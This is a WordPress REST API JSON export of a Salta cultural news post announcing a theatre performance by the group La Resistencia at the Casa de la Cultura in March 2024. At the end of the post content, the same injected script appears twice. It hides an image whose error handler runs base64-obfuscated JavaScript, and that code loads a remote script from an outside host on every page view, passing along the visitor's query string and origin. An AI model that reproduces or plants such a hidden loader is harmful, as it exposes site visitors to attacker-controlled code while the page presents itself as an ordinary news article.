{"id":3826,"date":"2024-03-07T08:48:25","date_gmt":"2024-03-07T11:48:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3826"},"modified":"2025-08-13T23:59:01","modified_gmt":"2025-08-14T02:59:01","slug":"ciclo-jueves-de-teatro-en-casa-de-la-cultura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3826","title":{"rendered":"Ciclo \u201cJueves de Teatro\u201d en Casa de la Cultura"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-19b426fa9cedbd3fba6934027ad8eda2\" style=\"background-color:#872840\"><em>En su tercer a\u00f1o consecutivo, el ciclo que se presenta en Caseros 460 tendr\u00e1 su primera funci\u00f3n de la Temporada 2024 el jueves 7 de marzo.<\/em><\/h3>\n\n\n\n<p>El grupo teatral La Resistencia se presentar\u00e1 en el marco del Ciclo \u201cJueves de Teatro\u201d hoy&nbsp;jueves 7 de marzo a las 21 horas en la Sala Mecano de la&nbsp;<strong>Casa de la Cultura&nbsp;<\/strong>(Caseros 460).<\/p>\n\n\n\n<p>\u201cLas Marrones o el \u00faltimo d\u00eda antes del Gorgolato\u201d, &nbsp;es una obra cuya trama aborda a dos mujeres que son la resistencia para el Programa Internacional de Justicia y Aniquilaci\u00f3n; y son las \u00faltimas sobrevivientes marrones en un mundo hegem\u00f3nico, dispuestas a luchar para seguir vivas.<\/p>\n\n\n\n<p>AUTORES: Gabriela V\u00e1zquez, Flavia Salim y Gustavo Vergara.<\/p>\n\n\n\n<p>G\u00c9NERO: Comedia Absurda.<\/p>\n\n\n\n<p>DURACI\u00d3N DEL ESPECT\u00c1CULO: 50 minutos.<\/p>\n\n\n\n<p>Entrada general de $3050 (dos por $5100) a la venta en www.saltaticket.gob.ar<\/p>\n\n\n\n<p><strong>Sobre el Ciclo<\/strong><\/p>\n\n\n\n<p>La Secretar\u00eda de Cultura presenta todos los jueves en la Sala Mecano o en la Sala \u201cJuan Carlos D\u00e1valos\u201d de la Casa de la Cultura, obras de teatro de compa\u00f1\u00edas salte\u00f1as con el fin de promover la actividad teatral local y acercar al p\u00fablico propuestas diversas en un lenguaje propio.<\/p>\n\n\n\n<p>A la fecha, m\u00e1s de 70 agrupaciones ofrecieron propuestas de diversos g\u00e9neros, brindando una opci\u00f3n novedosa al circuito cultural salte\u00f1o. Cabe destacar que a lo largo del ciclo las obras no se repiten en ninguna de sus temporadas.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/ciclo-jueves-de-teatro-en-casa-de-la-cultura-94332\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En su tercer a\u00f1o consecutivo, el ciclo que se presenta en Caseros 460 tendr\u00e1 su primera funci\u00f3n de la Temporada 2024 el jueves 7 de marzo. El grupo teatral La Resistencia se presentar\u00e1 en el marco del Ciclo \u201cJueves de Teatro\u201d hoy&nbsp;jueves 7 de marzo a las 21 horas en la Sala Mecano de la&nbsp;Casa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3827,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3826","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3826"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3826"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3826\/revisions"}],"predecessor-version":[{"id":6830,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3826\/revisions\/6830"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3827"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3826"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3826"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3826"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}